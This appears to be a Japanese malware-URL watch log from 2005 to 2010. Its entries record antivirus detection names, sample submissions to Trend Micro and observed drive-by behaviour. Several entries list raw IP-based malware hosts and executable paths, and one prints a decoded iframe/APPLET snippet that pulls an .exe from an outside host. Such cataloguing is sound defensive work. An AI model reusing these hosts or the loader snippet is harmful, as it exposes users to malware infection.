通し番号. | URL( 数字→アルファベット順 )
[確認日/掲載日] 鑑定結果/解説 |
← このようになっています。 |
[2009/03/12] | ウィルス名:TSPY_BANKER.KAT |
[2008/08/14] | 2008/07/21 の時点で以下のファイルが落ちてきた。しかし、今日改めて確認すると、ファイルは落ちて来ず、ページも無くなっていた。
//190.92.0.45/cat/viewcard.exe ← ウィルス名:BKDR_VANBOT.NI |
[2008/08/14] | 2008/07/21 にトレンドマイクロ社にファイルを提出。
2008/08/05 にその結果の連絡があり、パターンファイル[5.435.00] にてウィルス名:BKDR_VANBOT.NI として検出するよう対応、とのこと。 実際に 2008/07/21 にDLしたファイルからウィルス名:BKDR_VANBOT.NI を検出することを確認。 しかし、今日改めて当該URLからDLしようとしたら 404 であった。 |
[2010/03/22] | ファイルサイズ:405 KB 。高い確率で不正なファイルと思われる。 |
[2010/03/22] | ファイルサイズ:404 KB 。高い確率で不正なファイルと思われる。 |
[2010/03/22] | ファイルサイズ:429 KB 。高い確率で不正なファイルと思われる。 |
[2010/03/23] | ファイルサイズ:222 KB 。高い確率で不正なファイルの一種と思われる。 |
[2010/03/22] | ファイルサイズ:196 KB 。ウィルス名:WORM_PALEVO.AK |
[2009/03/12] | ウィルス名:TROJ_AGENT.MMJ |
[2009/01/28] | gif画像ではなく、「file.exe」という名前のファイルが落ちてくる。
しかし、ウィルス名:PAK_GENERIC.001 を検出。 |
[2009/01/28] | 他の方の結果は以下の「」内。
「踏んでみると実行ファイルが出てきて a-squared などがウイルス「Trojan.Win32.Vundo!IK」を検出しました。」 |
[2008/12/11] | ウィルス名:TROJ_FAKEALER.PV |
[2006/12/28] | ウィルス名:PE_PARITE.A |
[2006/05/06] | ウィルス名:TROJ_SMALL.BGX [ ウィルスバスター ]
ウィルス名:Adware.Dh [ Dr.Web ] |
[2006/05/06] | ウィルス名:TROJ_DROPPER.AOA [ ウィルスバスター ]
ウィルス名:Trojan.MulDrop.3049 [ Dr.Web ] |
[2006/07/22] | ウィルス名:TROJ_DLOADER.ATW |
[2007/02/20] | DL+解凍すると「NewBrowser.exe」「sexfiles.exe」の2つのファイルが現れる。
2007/02/12 にトレンドマイクロ社に この2つのファイルを提出。 今日、その結果の連絡があり、以下の様に検出するよう対応、とのこと。 「NewBrowser.exe」 → ウィルス名:DIAL_SEXFILE.A 「sexfiles.exe」 → ウィルス名:DIAL_SEXFILE.B 実際に 2007/02/12 にDLしたファイルと、今日改めてDLしたファイルから上記の様にウィルスを検出することを確認。 2007/02/12 から今日までのファイルの置き換えは無いと推測される。 |
[2005/07/14] | ウィルス名:JS_MHTREDIR.P |
[2005/07/14] | ウィルス名:JAVA_BYTEVER.A |
[2005/06/07] | 踏むと こんな感じ のサーチサイト。スパイウェア:Cool Web Searchと同じ。
この セキュリティ警告 を表示し、拒否すると これ を表示。「OK」を押すと再びセキュリティ警告表示。2回目のセキュリティ警告を拒否すると、それ以降、何も無し。 このセキュリティ警告に関係するURLは以下。 //69.31.82.26/connect.cgi?id=10 //69.31.82.26/aconnect.cgi?wmid=10&pg=1 |
[2005/07/01] | 「sploit.anr」というファイルが落ちてくる。バスター無反応だが、以下のアンチウィルスソフトで反応。
AntiVir → TR/Exploit.MS05-002.Ani.A BitDefender → Exploit.Win32.MS05-002.Gen ClamAV → Exploit.W32.MS05-002 Dr.Web → Exploit.ANIFile Kaspersky Anti-Virus → Trojan-Downloader.Win32.Ani.c VBA32 → Trojan-Downloader.Win32.Ani.c |
[2008/12/11] | ウィルス名:TROJ_EXCHANGE.AP |
[2006/10/11] | ウィルス名:DIAL_CARPED.N |
[2006/08/29] | 2008/08/08 にトレンドマイクロ社にファイルを提出。
未だにトレンドマイクロ社から結果の連絡は無いが、ウィルス名:DIAL_CARPED.N として対応してくれた模様。 2008/08/08 にDLしたファイルからウィルス名:DIAL_CARPED.N を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_CARPED.N を検出することを確認。 |
[2005/03/06] | ウィルス名:JAVA_BYTEVER.A |
[2005/07/28] | ウィルス名:JAVA_BYTEVER.A。ソースはほとんど暗号化されているが、その中に下のURLを呼び出す記述が隠れている。
//195.225.176.25/user6/msjld.jar |
[2006/10/11] | ウィルス名:TROJ_ANICMOO.N+JAVA_BYTEVER.A |
[2005/07/28] | ウィルス名:JAVA_BYTEVER.A |
[2006/09/20] | 2006/09/08 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_AGENT.ERP として検出するよう対応、とのこと。 2006/09/08 にDLしたファイルからウィルス名:TROJ_AGENT.ERP を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:TROJ_AGENT.ERP を検出することを確認。 |
[2006/10/01] | 2006/09/23 にトレンドマイクロ社にファイルを提出。
2006/09/29 にその結果の連絡があり、ウィルス名:TROJ_SMALL.DOK として検出するよう対応、とのこと。 2006/09/23 にDLしたファイルからウィルス名:TROJ_SMALL.DOK を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:TROJ_SMALL.DOK を検出することを確認。 |
[2006/09/20] | 2006/09/08 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_SMALL.CUJ として検出するよう対応、とのこと。 しかし、2006/09/08 にDLしたファイルからはウィルス名:TROJ_SMALL.DFO を検出する。 しかも、今日改めて当該URLからDLしてみるとバスター無反応。 恐らく、新しいファイルに随時置き換えられるURLと推測される。 |
[2006/10/01] | 2006/09/23 にトレンドマイクロ社にファイルを再提出。
2006/09/29 にその結果の連絡があり、ウィルス名:TROJ_SMALL.DOJ として検出するよう対応、とのこと。 2006/09/23 にDLしたファイルからウィルス名:TROJ_SMALL.DOJ を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:TROJ_SMALL.DOJ を検出することを確認。 |
[2006/10/14] | 2006/10/11 にトレンドマイクロ社に上記2つのファイルを提出。
2006/10/13 にその結果の連絡があり、2つのファイルとも「正常と判断されたファイルで対応は行わない。」とのこと。 |
[2006/06/24] | バスター無反応だが、以下のアンチウィルスソフトで反応。
AntiVir → HEUR/Hijacker BitDefender → BehavesLike:Win32.ExplorerHijack DrWeb → MULDROP.Trojan packed by BINARYRES |
[2006/07/31] | 再確認。ウィルス名:TROJ_SMALL.AZK |
[2006/09/24] | 再確認。今度はウィルス名:TROJ_AGENT.EVP を検出する。 |
[2006/10/24] | 2006/10/16 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_DLOADER.EQX として検出するよう対応、とのこと。 実際に 2006/10/16 にDLしたファイルからウィルス名:TROJ_DLOADER.EQX を検出することを確認。 しかし、今日改めて当該URLからDLしてみるとバスター無反応。 新しいファイルに置き換えられているものと思われる。 |
[2005/06/09] | ウィルス名:JS_PSYME.AF+JAVA_BYTEVER.A+JAVA_BYTEVER.K+JAVA_BYTEVER.A-1
このセキュリティ警告 を表示し、拒否すると これ を表示する。
その後、これ を表示。その間、自分のリモホ内容の全画面表示。 APPLETタグで右を実行 → //195.225.177.14/mmm/mmm.jar 新窓で右をリモホ表示 → //rockygirl.com/warning.php IFRAMEタグで右を呼ぶ → //69.50.182.94/connect.cgi?id=1096 IFRAMEタグで右を呼ぶ → //toolbarpartner.com/in.php?wm=2MAEjHcR |
[2005/06/09] | ウィルス名:JAVA_BYTEVER.A |
[2005/07/12] | バスター無反応だが、以下のアンチウィルスソフトで反応。
AntiVir → TR/Dldr.Smal.awa.23 ArcaVir → Trojan.Downloader.Small Avast → Win32:Trojano-1465 AVG Antivirus → Downloader.Small.43.D Dr.Web → Trojan.DownLoader.2775 Kaspersky Anti-Virus → Trojan-Downloader.Win32.Small.awa NOD32 → Win32/TrojanDownloader.Small.AWA VBA32 → Trojan-Downloader.Win32.Small.awa |
[2005/07/12] | ウィルス名:JAVA_BYTEVER.A
ソースを見るとエンコードされた部分が何箇所かある。その中から以下のスクリプトが現れてくる。 <iframe src='Z6VB46e.php'></iframe> <APPLET ARCHIVE='qrxLcUX.jar' CODE='BlackBox.class' WIDTH=1 HEIGHT=1> <PARAM NAME='url' VALUE='http://195.225.177.33/0023.exe'></APPLET> つまり、IFRAMEタグで下の 1. を呼び出し、環境により、2. を発動して 3. を放り込む。
|
[2005/07/12] | ウィルス名:JAVA_BYTEVER.A |
[2005/05/22] | 踏むと海外アダルトサイト。
ウィルス名:TROJ_ANICMOO.G+JAVA_BYTEVER.A+JAVA_BYTEVER.C+JAVA_BYTEVER.A-1 このセキュリティ警告 を表示。また、IFRAMEタグを使い、以下の3つのURLを呼び出す。 //69.50.182.94/connect.cgi?id=1342 //69.50.177.102/x125/ind.php //195.225.177.38/tds/in.cgi?nine&group=ma |
[2005/06/11] | 改めて確認。ウィルス名:JS_MHTREDIR.P
以前とソースが変更されている。以前にあったIFRAMEタグ呼び出しは使われていない。 |
[2005/07/12] | 改めて確認。ウィルス名:JS_MHTREDIR.Pを検出後、少しの間、HDDがガリガリ唸り出し、唸り終わるとウィルス名:TROJ_SMALL.AMIを検出。同時にIEが落ちる。IEが落ちるのは数回確認。
ソースを見ると、まず、暗号化された部分がある。そこから以下の1のURLが現れる。 次に、IFRAMEタグを使い、2、3のURLを呼び出している。 次にJavaScriptを使い、4を呼び出している。4のURLの「呼び出すURL」が曲者。 1、//82.179.170.11/35167/ ← ウィルス名:JAVA_BYTEVER.A-1 2、//69.50.173.166/connect.cgi?id=1342 ← 環境により、ダイヤラーが落ちてくる。 3、//69.50.177.102/x125/ind.php ← 詳細はこのURL解説を参照。 4、//www.trackhits.cc/cnt/processor?tony008_1 ← 詳細はこのURL解説を参照。 |
[2005/08/22] | 再確認。ページ更新されている。バスター無反応。
真っ白なページに左上に「Account closed due terms violation」と書かれているだけ。 |
[2005/12/05] | 再確認。踏むと こんな感じ で、バスター無反応。
真っ白なページの左上のほうに「 Account closed due terms violation 」と書かれているだけであった。ソースを見ても異常無し。 |
[2005/12/18] | 他の方の結果は以下の「」内。
「海外ウイルスサイトに飛ばされます。」 「Trojan-Downloader.JS.Phel.d , Exploit.JS.CVE-2005-1790.a , Exploit.JS.CVE-2005-1790.b検出。」 |
[2005/12/18] | 踏むと //www.easypic.org/ に飛び、海外アダルトサイトを表示する。
少し経過してからウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.ACを検出。 //www.lolitapost.biz/ ← 海外アダルトサイトも別窓で開く。 その後、色々なアダルトサイトがブラクラ並に開く現象を確認。 |
[2006/01/02] | 再確認。//www.easypic.org/?sample01.jpgに飛ぶので、そちらのURL List解説を参照。 |
[2006/01/12] | 再確認。//www.easypic.org/ に飛び、海外アダルトサイトを表示するが、「xpl.wmf」ファイルをDLしろ、と言ってくる。同時にウィルスを検出。
検出したウィルス名:EXPL_WMF.GEN+TROJ_NASCENE.Y+JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC |
[2005/12/18] | 他の方の結果は以下の「」内。
「海外エロサイトに飛ばされます。ノートン無反応だが、Javaアプレットを起動します。怪しいので行かないほうがいい。」 「Trojan-Downloader.JS.Phel.d , Exploit.JS.CVE-2005-1790.a , Exploit.JS.CVE-2005-1790.b , Exploit.Java.ByteVerifyなどを検出。」 |
[2005/12/18] | 踏むと //www.pornhit.net/ に飛び、海外アダルトサイトを表示する。
少し経過してからウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.ACを検出。 //www.lolitapost.biz/ ← 海外アダルトサイトも別窓で開く。 その後、色々なアダルトサイトがブラクラ並に開く現象を確認。 |
[2005/12/16] | 他の方の結果では、
「ブラクラ+ウイルスです。トロイ系ウイルス JS/Exploit-BO.gen を検出。その他 逃げウィンドウ ゾンビ ウィンドウなど。」 |
[2005/12/16] | 踏むと下のURLに飛び、ウィルスを検出する。詳細はURL List解説を参照。
//www.pornwoods.com/?gala-sex.com |
[2007/02/20] | 2007/02/12 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:ADW_IMIBAR.G として検出するよう対応、とのこと。 実際に 2007/02/12 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:ADW_IMIBAR.G を検出することを確認。 2007/02/12 から今日までのファイルの置き換えは無いと推測される。 |
[2007/02/12] | ウィルス名:ADW_SHOPNAV.H |
[2007/02/12] | ウィルス名:TROJ_Generic.Z |
[2007/02/20] | 2007/02/12 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:ADW_IMIBAR.F として検出するよう対応、とのこと。 実際に 2007/02/12 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:ADW_IMIBAR.F を検出することを確認。 2007/02/12 から今日までのファイルの置き換えは無いと推測される。 |
[2008/12/11] | ウィルス名:TROJ_PAKES.AGN |
[2006/08/01] | 2006/07/27 にトレンドマイクロ社にファイルを提出。
今日、その連絡があり、ウイルスパターンファイル「3.629.00」にて、ウィルス名:CHM_DROPPER.BKL として検出するよう対応したとのこと。 実際にファイルをDLしてウィルス名:CHM_DROPPER.BKL を検出することを確認。 |
[2005/05/31] | 踏むと海外アダルトサイト。閉じると以下の1を表示。1を閉じると2を表示。2を閉じると3を表示。
1、//198.143.27.5/aus_exit_1a.asp 2、//198.143.27.5/aus_exit_2a.asp 3、//198.143.27.5/aus_exit_3a.asp なお、上記のすべてのページで、すべてのリンク先は//198.143.27.5/USA.EXEにリンクしている。このURL解説を参照。 また、上記のすべてのページで、このセキュリティ警告 を表示。//198.143.27.5/USA.cabをDLして実行するよう催促される。このURL解説を参照。 また、3を閉じると「other.exe」なるファイルをDLしようとしてくる。この「other.exe」のURLは//198.143.27.5/other.exe ← このURL解説を参照。 |
[2005/10/21] | 再確認。404になっている。 |
[2005/03/06] | ウィルス名:TROJ_QDIALER.R |
[2005/05/31] | 真ん中の/USA.cabを解凍すると「12300010.exe」と「dialar」という名のセットアップ情報ファイルが現れる。
セットアップ情報ファイルは無害。「12300010.exe」と「other.exe」と「USA.EXE」は同じもので、バスター無反応だが、以下のアンチウィルスソフトでウィルスを検出。 バスター無反応だが、以下のアンチウィルスソフトでウィルスを検出。3つともダイヤラー。 Dr.Web → ウィルス名:Dialer.Fairtale Fortinet → ウィルス名:W32/ParHltnDialer.A-tr Kaspersky Anti-Virus → ウィルス名:Porn-Dialer.Win32.AsianRaw.ag NOD32 → ウィルス名:NewHeur_PE VBA32 → ウィルス名:Porn-Dialer.Win32.AsianRaw.ag |
[2005/09/02] | USA.EXEを実行すると こんなウィンドウ画面 を表示する。 |
[2005/03/06] | ウィルス名:TROJ_SMALL.FT |
[2006/10/30] | 2006/10/16 にトレンドマイクロ社にDL+解凍して現れた「55506857.exe」ファイルを提出。
2006/10/24 にその結果の連絡があり、ウィルス名:DIAL_TELEX.B として検出するよう対応、とのこと。 実際に 2006/10/16 にDLしたファイルからウィルス名:DIAL_TELEX.B を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_TELEX.B を検出することを確認。 |
[2006/10/16] | ウィルス名:DIAL_ADULTCHAT.C |
[2006/10/27] | 2006/10/15 にトレンドマイクロ社にDL+解凍して現れた「99930903.exe」ファイルを提出。
今日、その結果の連絡があり、ウィルス名:DIAL_ASIANRAW.AE として検出するよう対応、とのこと。 実際に 2006/10/15 にDLしたファイルからウィルス名:DIAL_ASIANRAW.AE を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_ASIANRAW.AE を検出することを確認。 |
[2006/10/15] | ウィルス名:TROJ_SMALL.FT |
[2007/03/07] | 2006/10/15 にトレンドマイクロ社に中身の「99930886.exe」ファイルを提出。
2006/10/27 にその結果の連絡があり、ウィルス名:TROJ_Generic として検出するよう対応、とのこと。 実際に 2006/10/15 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_Generic を検出することを確認。 2006/10/15 から今日まではファイルは置き換えられていないと推測される。 |
[2007/03/07] | 2006/10/15 にトレンドマイクロ社にファイルを提出。
2006/10/27 にその結果の連絡があり、ウィルス名:TROJ_Generic として検出するよう対応、とのこと。 実際に 2006/10/15 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_Generic を検出することを確認。 2006/10/15 から今日まではファイルは置き換えられていないと推測される。 |
[2006/10/15] | ウィルス名:DIAL_WILDFLICK.A |
[2006/10/27] | 2006/10/15 にトレンドマイクロ社にDL+解凍して現れた「99930080.exe」ファイルを提出。
今日、その結果の連絡があり、ウィルス名:DIAL_ASIANRAW.AD として検出するよう対応、とのこと。 実際に 2006/10/15 にDLしたファイルからウィルス名:DIAL_ASIANRAW.AD を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_ASIANRAW.AD を検出することを確認。 |
[2006/10/27] | 2006/10/15 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:DIAL_ASIANRAW.AD として検出するよう対応、とのこと。 実際に 2006/10/15 にDLしたファイルからウィルス名:DIAL_ASIANRAW.AD を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_ASIANRAW.AD を検出することを確認。 |
[2008/08/28] | Location ヘッダで、以下のURLに飛び、ウィルス名:TSC_GENCLEAN+HTML_DLOAD.HM を検出。
//200.41.67.195/stats/pornotube/index1.htm |
[2008/08/28] | 海外アダルトサイトだが、ウィルス名:TSC_GENCLEAN+HTML_DLOAD.HM を検出。 |
[2008/08/28] | ウィルス名:TSC_GENCLEAN+TROJ_FAKEALER.PV |
[2007/02/09] | ウィルス名:TROJ_SMALL.FVT |
[2007/02/14] | 2007/02/09 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TSPY_BANKER.GFJ として検出するよう対応、とのこと。 実際に 2007/02/09 にDLしたファイルからウィルス名:TSPY_BANKER.GFJ を検出することを確認。 しかし、今日改めて当該URLを調べてみると404であった。 |
[2007/02/09] | ウィルス名:TSPY_BANKER.GAO |
[2007/02/09] | ウィルス名:TROJ_BANLOAD.BTW |
[2007/02/09] | ウィルス名:TSPY_BANKER.GAO |
[2007/02/22] | 2007/02/09 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TSPY_BANKER.GDH として検出するよう対応、とのこと。 実際に 2007/02/09 にDLしたファイルからウィルス名:TSPY_BANKER.GDH を検出することを確認。 しかし、今日改めて当該URLを見てみるとファイルは落ちてこなかった。 |
[2007/02/09] | ウィルス名:TSPY_BANKER.GAO |
[2007/02/27] | 2007/02/11 にトレンドマイクロ社にファイルを提出。
2007/02/26 にその結果の連絡があり、ウィルス名:TSPY_BANCOS.CYN として検出するよう対応、とのこと。 実際に 2007/02/11 にDLしたファイルからウィルス名:TSPY_BANCOS.CYN を検出することを確認。 しかし、今日改めて当該URLを見てみるとファイルは落ちてこなかった。 |
[2007/02/27] | 2007/02/11 にトレンドマイクロ社にファイルを提出。
2007/02/26 にその結果の連絡があり、ウィルス名:TROJ_DLOADER.ITH として検出するよう対応、とのこと。 実際に 2007/02/11 にDLしたファイルからウィルス名:TROJ_DLOADER.ITH を検出することを確認。 しかし、今日改めて当該URLを見てみるとファイルは落ちてこなかった。 |
[2007/02/09] | ウィルス名:TROJ_DLOADER.IFU |
[2009/03/15] | 「visualizar.exe」ファイルが落ちてくる。ファイルサイズ:17 KB 。バスター無反応だが、他社製ウィルス駆除ソフトによっては反応する。 |
[2007/01/21] | ウィルス名:TSPY_BANKER.FXC |
[2007/03/06] | 2007/02/28 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_DLOADER.KHO として検出するよう対応、とのこと。 実際に 2007/02/28 にDLしたファイルからウィルス名:TROJ_DLOADER.KHO を検出することを確認。 しかし、今日改めて当該URLを調べてみると、ファイルは落ちてこなかった。 |
[2007/02/27] | 2007/02/11 にトレンドマイクロ社にファイルを提出。
今日までに連絡は無かったが、ウィルス名:TROJ_DLOADER.FCD として対応したらしい。 実際に 2007/02/11 にDLしたファイルからウィルス名:TROJ_DLOADER.FCD を検出。 しかし、今日改めて当該URLを見てみるとファイルは落ちてこなかった。 |
[2007/02/27] | 2007/02/11 にトレンドマイクロ社にファイルを提出。
2007/02/26 にその結果の連絡があり、ウィルス名:TROJ_VB.CBR として検出するよう対応、とのこと。 実際に 2007/02/11 にDLしたファイルからウィルス名:TROJ_VB.CBR を検出。 しかし、今日改めて当該URLからDLしてみるとバスター無反応。 2007/02/11 から今日までの間にファイルが置き換えられたと推測される。 |
[2007/03/06] | 2007/02/28 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_VB.CNU として検出するよう対応、とのこと。 実際に 2007/02/28 にDLしたファイルからウィルス名:TROJ_VB.CNU を検出することを確認。 しかし、今日改めて当該URLを調べてみると、ファイルは落ちてこなかった。 |
[2007/03/06] | 2007/02/28 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_VB.COW として検出するよう対応、とのこと。 実際に 2007/02/28 にDLしたファイルからウィルス名:TROJ_VB.COW を検出することを確認。 しかし、今日改めて当該URLを調べてみると、ファイルは落ちてこなかった。 |
[2007/02/28] | 2007/02/11 にトレンドマイクロ社にファイルを提出。
2007/02/26 にその結果の連絡があり、ウィルス名:TROJ_DLOADER.FBU として検出するよう対応、とのこと。 実際に 2007/02/11 にDLしたファイルからウィルス名:TROJ_DLOADER.FBU を検出。 しかし、今日改めて当該URLを見てみるとファイルは落ちてこなかった。 |
[2007/03/06] | 2007/02/28 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_VB.COW として検出するよう対応、とのこと。 実際に 2007/02/28 にDLしたファイルからウィルス名:TROJ_VB.COW を検出することを確認。 しかし、今日改めて当該URLを調べてみると、ファイルは落ちてこなかった。 |
[2008/11/22] | ウィルス名:TROJ_ZAPCHAST.ED |
[2007/05/03] | ウィルス名:TROJ_BANLOAD.BYL |
[2007/06/03] | 2007/05/04 にトレンドマイクロ社にファイルを提出。
2007/05/30 にその結果の連絡があり、ウィルス名:TSPY_BANKER.ILK として検出するよう対応、とのこと。 実際に 2007/05/04 にDLしたファイルからウィルス名:TSPY_BANKER.ILK を検出することを確認。 しかし、今日改めて当該URLを見てみるとファイルは落ちてこなかった。 |
[2009/03/12] | ウィルス名:TROJ_DELF.HVU |
[2009/03/12] | ウィルス名:TROJ_DELF.HVU |